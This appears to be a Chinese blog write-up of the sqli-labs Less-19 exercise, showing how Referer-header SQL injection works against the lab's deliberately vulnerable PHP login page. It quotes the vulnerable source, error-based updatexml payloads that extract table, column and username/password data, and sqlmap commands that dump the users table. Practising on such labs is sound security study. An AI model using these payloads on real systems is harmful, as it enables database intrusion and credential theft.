Less19 (referer注入)

最新推荐文章于 2024-06-03 17:36:29 发布
最新推荐文章于 2024-06-03 17:36:29 发布
阅读量1.6k 收藏 5
点赞数 1
分类专栏: # SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901998/article/details/107021685
版权

文章目录

1. 什么是referer?

简单讲就是当你访问一个网站的时候,你的浏览器需要告诉服务器你是从哪个地方访问服务器的。(直接输入网址或者其他页面中的链接点进来的)。
之前写过一篇关于referer的文章,不明白的小伙伴可以点击下方链接看一下。
HTTP请求头中的referer字段

2. 分析题目

这关的思路和Less-8几乎是一样的。首先看一下网站源码:

$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
	$result1 = mysql_query($sql);
	$row1 = mysql_fetch_array($result1);
		if($row1)
			{
			echo '<font color= "#FFFF00" font size = 3 >';
			$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
			mysql_query($insert);
			//echo 'Your IP ADDRESS is: ' .$IP;
			echo "</font>";
			//echo "<br>";
			echo '<font color= "#0000ff" font size = 3 >';			
			echo 'Your Referer is: ' .$uagent;
			echo "</font>";
			echo "<br>";
			print_r(mysql_error());			
			echo "<br><br>";
			echo '<img src="../images/flag.jpg" />';
			echo "<br>";
			
			}

由于passwordusername字段有严格的过滤,因此我们将注入的重点放在referer上。

我们可以研究一下这条sql语句:

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";

网站首先获取了请求头中的referer,然后通过insert语句插入到了数据库中。

因此,我们可以使用updatexml函数对其进行注入。

先测试一下当前使用的数据库:
' or updatexml(1, concat('#', database()), 0), 1) #
在这里插入图片描述
可以看到网站返回了他当前使用的数据库是security。这也就证明我们的思路是正确的。

3. 手工注入

知道注入的格式以后,我们只需要构造对应的注入语句即可,下面就把注入语句给出,不在截图展示:

  1. 查看当前数据库下有哪些数据表
    ' or updatexml(1, concat('#', (select group_concat(table_name) from information_schema.tables where table_schema="security")), 0), 1) #

  2. 查看users表中有哪些字段
    ' or updatexml(1, concat('#', (select group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="security")), 0), 1) #

  3. users表中的值
    ' or updatexml(1, concat('#', (select concat(id, username, password) from users limit 0,1)), 0), 0) #

4. SQLmap注入

首先用burp suite拦截浏览器的请求,然后将请求消息复制到一个文本中。

POST /sqli/Less-19/ HTTP/1.1
Host: 自己sqli的IP地址
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: 自己sqli的IP地址
Connection: close
Referer: * # 注意这里是referer注入,所以要将referer字段设置值为*
Upgrade-Insecure-Requests: 1

uname=admin&passwd=admin&submit=Submit

然后输入sqlmap -r 桌面/header.txt --batch
在这里插入图片描述
接着:
sqlmap -r 桌面/header.txt --batch --current-db 查当前使用的数据库
sqlmap -r 桌面/header.txt --batch -D security --tablessecurity数据库下有哪些数据表
sqlmap -r 桌面/header.txt --batch -D security -T users --columnsusers表下有哪些字段
sqlmap -r 桌面/header.txt --batch -D security -T users --dumpusers表下所有的值
在这里插入图片描述

老司机开代码
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHub - Refer注入
Have_a_great_day的博客
09-12 609
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
Sqli-labs之Less-18和Less-19
m0_46315342的博客
06-04 667
                                          &nbs...
sql注入 (运用sqlmap解题)
最新发布
Z11762的博客
06-03 1981
注:level参数使用–batch参数可指定payload测试复杂等级。共有五个级别,从1-5,默认值为1。等级越高,测试的payload越复杂,当使用默认等级注入不出来时,可以尝试使用–level来提高测试等级。--level参数决定了 sqlmap 在检测 SQL 注入时的 “努力程度”。
ctfhub技能树—SQL注入referer注入
Naptmn的博客
02-07 1234
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
UA头注入Cookie注入Referer注入
十五年游戏主程转渗透之路
04-09 5066
UA头注入,Cookie注入Referer注入
javascript操作referer详细解析
10-26
JavaScript中的`referer`是一个关键的HTTP头部字段,它记录了用户从哪个URL访问了当前页面。这个信息对于网站分析、追踪用户来源以及了解流量来源至关重要。在JavaScript中,我们可以使用`document.referrer`来获取...
PHP伪造referer实例代码
10-30
然后,使用 `fsockopen` 函数连接目标主机,并构建伪造的 Referer 信息,包括 `Host`、`Referer` 和 `User-Agent`。 模拟 HTTP 请求 代码使用 `fputs` 函数将伪造的 Referer 信息发送到目标主机,并模拟一个 GET ...
Java 通过设置Referer反盗链
09-05
当用户从一个外部链接访问网站资源时,浏览器通常会在请求头中携带`Referer`字段,表明是从哪个页面发起的请求。如果`Referer`不在允许的列表内,网站服务器就会拒绝提供资源。 Java中,我们可以利用`java.net....
SQL注入思路详解
12-14
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序在处理用户输入数据时的不足,使得攻击者能够构造恶意的SQL语句来控制或篡改数据库。本文将深入解析SQL注入的思路,帮助你理解和防范这种攻击。 首先,SQL...
referer.txt
11-22
html跳转阻断referer,跳转后台的页面获取不到来源页面的referer,某些特定场景下很实用
16、HTTP头注入(User-Agent、Referer)
weixin_41489908的博客
12-05 2077
环境sqli-labs less 18 1、在UA处输入特殊字符,报错 ​ 2、构造输入语句,获取数据库名称 or updatexml(1,concat(’##’,(database())),0))# 3、获取表名 or updatexml(1,concat(’##’,(select group_concat(table_name) from information_schema.table...
http头部注入
我不是大牛
06-25 5733
http头部注入 我们首先可以在浏览器设置手动代理模式,然后通过burpsuite进行代理配置后进行抓包,如下是一个网站登录页面的http头部信息: POST /baji/check_login.php HTTP/1.1 Host: 192.168.120.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/201...
sqli-labs Less 19
m0_60829468的博客
11-05 247
​​​​​​ 一、观察less19,思考 观察less19发现,19关的设定和18关十分相识,细节部分可以看我的18关闯关详细讲解,这里直接开始通关流程。 二、查数据库名 Referer: http://localhost/sqlilabs/Less-19/'and extractvalue(1,concat(0x7e,database(),0x7e)) and ' 三、查询表名 Referer: http://localhost/sqlilabs/Less-19/'and..
SQL注入之HTTP头注入漏洞
Eagle_pompom的专栏
04-25 4094
输入参数主要覆盖范围有: HTTP 查询字符参数(GET):输入参数通过URL发送 HTTP 正文参数(POST):输入参数通过HTTP正文发送 HTTP Cookie参数:输入参数通过HTTP cookie发送 HTTP Headers:HTTP提交应用程序使用的头,包括User-agent和Referer头字段 潜在的HTTP头SQL注入有:Cookie, User-agent, R...
sqli-labs Less-19(HTTP-Referer注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 272
通过在Referer后面加上单引号和双引号测试,猜测SQL语句大致为 insert into xxx(a,b,c) values('','','') 发现这样的payload可以时sql语句正常执行 经过尝试,发现可以使用报错注入,利用extractvalue()函数 成功爆出数据库版本号。 ...
浅谈盲注中的基于时间型和布尔型的注入方法
热门推荐
pygain的博客
11-08 2万+
SQL显错注入已经被用烂了像这种漏洞,漏洞批量发现工具找一找,sqlmap跑一跑。 今天讲的是在我们的命令被带入数据库查询语句但是却什么都没有返回的情况我们该怎么办。例如应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的SQL注入办法就无法使用了。 盲注,即在SQL注入过程中,SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注
CTFHUB——Cookie、User-Agent、Referer注入 writeup
wuuconix's blog
08-29 747
背景 我们一般做sql注入的时候,注入点一般都是一个文本框,然后我们可以通过输入某种特殊的语句来获得数据库中的信息,但是有时候这种注入点可不一定给你一个文本框,而可能在请求包中的其他地方。 接下来我分享一下CTFHUB中的三道题,它们的注入点分别是请求包中的Cookie、User-Agent和Referer。它们只是注入点不同,基于的的注入方式都是最基本的union联合注入。所以它们的payload都十分简单和相似。 在这次做题过程中,我还尝试了强大的sqlmap,成功得到了一些结果。 SQL注入——Coo
CTFhub Refer注入
plant1234的博客
06-18 1333
Refer注入: 这道题首先我自己一开始也有点乱,找不到referer在哪里 但根据大佬的博客:https://blog.csdn.net/qq_37450949/article/details/117003065 提示的话知道,referer的一些知识: HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 这句话的意思就是,只有当你向浏
sql注入referer检查
09-15
SQL注入是一种常见的网络安全攻击方法,它利用用户输入数据的不正确处理,在数据库查询语句中插入恶意代码,从而执行非法的数据库操作。常用的防范SQL注入的方法之一是referer检查。 referer检查是通过验证HTTP请求的referer字段,确定请求来源的合法性。referer字段包含了用户点击链接或提交表单时的来源网址,可用于防止非法请求。在进行数据库操作前,服务器端会检查referer字段,如果来源网址不在白名单中,就会拒绝请求。 referer检查可以有效防止恶意用户使用SQL注入攻击。当用户尝试通过改变URL参数、输入恶意代码等方式进行注入时,由于referer字段不在白名单中,服务器会直接拒绝请求,从而保护了数据库的安全性。 然而,referer检查并不能完全防止SQL注入攻击。因为referer字段可以被伪造或篡改,攻击者有可能通过修改请求头或使用代理服务器等方式绕过referer检查。因此,referer检查只是SQL注入防御策略中的一个环节,还需要结合其他防御措施来提高安全性。 总结来说,SQL注入referer检查是一种有效的防御SQL注入攻击的方法,通过验证请求的来源网址,可以防止一部分恶意用户的非法请求。然而,它并不能完全防止SQL注入攻击,还需要配合其他的安全措施来提高系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值